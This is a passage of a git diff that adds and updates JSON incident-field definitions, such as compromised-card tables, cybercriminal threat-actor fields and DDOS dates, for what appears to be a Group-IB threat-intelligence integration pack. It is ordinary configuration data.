"script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "city", + "displayName": "city", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "region", + "displayName": "region", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "provider", + "displayName": "provider", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "countrycode", + "displayName": "countryCode", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "ip", + "displayName": "ip", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "malware", + "displayName": "malware", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "threatactor", + "displayName": "threatActor", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "datedetected", + "displayName": "dateDetected", + "type": "date", + "orgType": "date", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "datecompromised", + "displayName": "dateCompromised", + "type": "date", + "orgType": "date", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "phone", + "displayName": "phone", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "name", + "displayName": "name", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "email", + "displayName": "email", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "address", + "displayName": "address", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + } + ], + "defaultRows": [ + {} + ], + "sla": 0, + "threshold": 72, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json new file mode 100644 index 000000000000..b7d38c090182 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json @@ -0,0 +1,171 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibcompromisedeventstable", + "closeForm": true, + "columns": [ + { + "displayName": "Valid Thru Date", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "validthrudate", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Valid Thru", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "validthru", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Client IP", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "clientip", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "CNC", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "cnc", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "CNC IP", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "cncip", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Threat Actor Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "threatactorname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Compromised", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datecompromised", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Victim Phone", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "victimphone", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Victim Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "victimname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Malware", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "malware", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcompromisedeventstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Compromised Events Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json index a0764a1a0c79..8dce47a32c1f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json @@ -1,7 +1,8 @@ { "associatedToAll": false, "associatedTypes": [ - "GIB Compromised Account" + "GIB Compromised Account", + "GIB Compromised Account Group" ], "caseInsensitive": false, "cliName": "gibcompromisedlogin", @@ -25,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Account Group" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json new file mode 100644 index 000000000000..2c1cd4dba79d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibcountrycode", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcountrycode", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Country Code", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json new file mode 100644 index 000000000000..2cbb17a05c51 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibcountryname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcountryname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Country Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json index 9f7065ac5975..38419beb3e84 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json @@ -8,7 +8,22 @@ "GIB Data Breach", "GIB OSI Git Leak", "GIB OSI Public Leak", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibcredibility", @@ -33,5 +48,32 @@ "unsearchable": true, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" -} + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Data Breach", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" + ] +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json new file mode 100644 index 000000000000..93c73008f950 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalexpertises", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalexpertises", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Expertises", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json new file mode 100644 index 000000000000..ef90bdbb6328 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json @@ -0,0 +1,67 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalforumstable", + "closeForm": true, + "columns": [ + { + "displayName": "Nickname", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "nickname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 305 + }, + { + "displayName": "URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalforumstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Cybercriminal Forums Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json new file mode 100644 index 000000000000..379181c531c3 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalmalware", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalmalware", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Malware", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json new file mode 100644 index 000000000000..92aa0926b93d --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalregions", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalregions", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Regions", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json new file mode 100644 index 000000000000..1445c34629b1 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json @@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalsectors", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalsectors", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Sectors", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json new file mode 100644 index 000000000000..121d774b64ec --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreatactoraliases", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreatactoraliases", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Threat Actor Aliases", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json new file mode 100644 index 000000000000..1290f906341e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreatactordescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreatactordescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Threat Actor Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json new file mode 100644 index 000000000000..4c2417235551 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Report_Authors.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreatactorreportauthors", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreatactorreportauthors", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Threat Actor Report Authors", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json new file mode 100644 index 000000000000..cdb3acbcdf33 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json @@ -0,0 +1,80 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreatactorreportstable", + "closeForm": true, + "columns": [ + { + "displayName": "ID", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "id", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 181 + }, + { + "displayName": "Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "name", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 208 + }, + { + "displayName": "Date Published", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datepublished", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreatactorreportstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Cybercriminal Threat Actor Reports Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat Actor" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json new file mode 100644 index 000000000000..401aa895cf1e --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Description.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreatdescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreatdescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Threat Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json new file mode 100644 index 000000000000..bace2df405f2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Title.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Cybercriminal Threat" + ], + "caseInsensitive": true, + "cliName": "gibcybercriminalthreattitle", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcybercriminalthreattitle", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Cybercriminal Threat Title", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Cybercriminal Threat" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json new file mode 100644 index 000000000000..46b009cf1add --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Begin.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosdatebegin", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosdatebegin", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Date Begin", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json new file mode 100644 index 000000000000..28f967c48bfc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_End.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosdateend", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosdateend", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Date End", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json new file mode 100644 index 000000000000..d463cdfaffc2 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Date_Registration.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks DDOS" + ], + "caseInsensitive": true, + "cliName": "gibddosdateregistration", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibddosdateregistration", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB DDOS Date Registration", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks DDOS" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json new file mode 100644 index 000000000000..4e362f8209c0 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_DDOS_Duration.json @@ -0,0 +1,34 